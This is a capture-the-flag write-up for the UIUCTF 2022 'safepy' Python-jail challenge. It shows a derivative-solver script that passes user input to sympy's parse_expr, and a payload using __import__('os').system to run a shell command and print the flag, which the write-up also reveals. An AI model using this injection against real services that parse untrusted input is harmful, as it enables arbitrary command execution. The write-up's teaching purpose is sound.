Tags: pyjail python 

Rating: 4.0

## rev/safepy
**Description: godlike snake with a nebula behind it and math equations floating around it**

[challenge file](https://2022.uiuc.tf/files/d242f7830f4f4a51cd068df3decf7612/handout.tar.gz?token=eyJ1c2VyX2lkIjoxMzQsInRlYW1faWQiOjE2MywiZmlsZV9pZCI6NjU3fQ.YuVUdA.TU9BWpZir1-_AH5A1PBXGTFfkO8)

Given python script
```python
from sympy import *

def parse(expr):
# learned from our mistake... let's be safe now
# https://stackoverflow.com/questions/33606667/from-string-to-sympy-expression
# return sympify(expr)

# https://docs.sympy.org/latest/modules/parsing.html
return parse_expr(expr)

print('Welcome to the derivative (with respect to x) solver!')
user_input = input('Your expression: ')
expr = parse(user_input)
deriv = diff(expr, Symbol('x'))
print('The derivative of your expression is:')
print(deriv)
```
This issue in github shows the vulnerability in **parse_expr**.

[vulnerable explanation](https://github.com/sympy/sympy/issues/10805#issuecomment-1002147366)

**payload:**
```python
__import__("os").system("cd / && cat flag")
```

**Output**
```shell
== proof-of-work: disabled ==
Welcome to the derivative (with respect to x) solver!
Your expression: __import__("os").system("cd / && cat flag")
uiuctf{na1v3_0r_mal1ci0u5_chang3?}

The derivative of your expression is:
0
```
**flag:uiuctf{na1v3_0r_mal1ci0u5_chang3?}**

Original writeup (https://gmvivekanandan.github.io/posts/UIUCTF-2022/#revsafepy).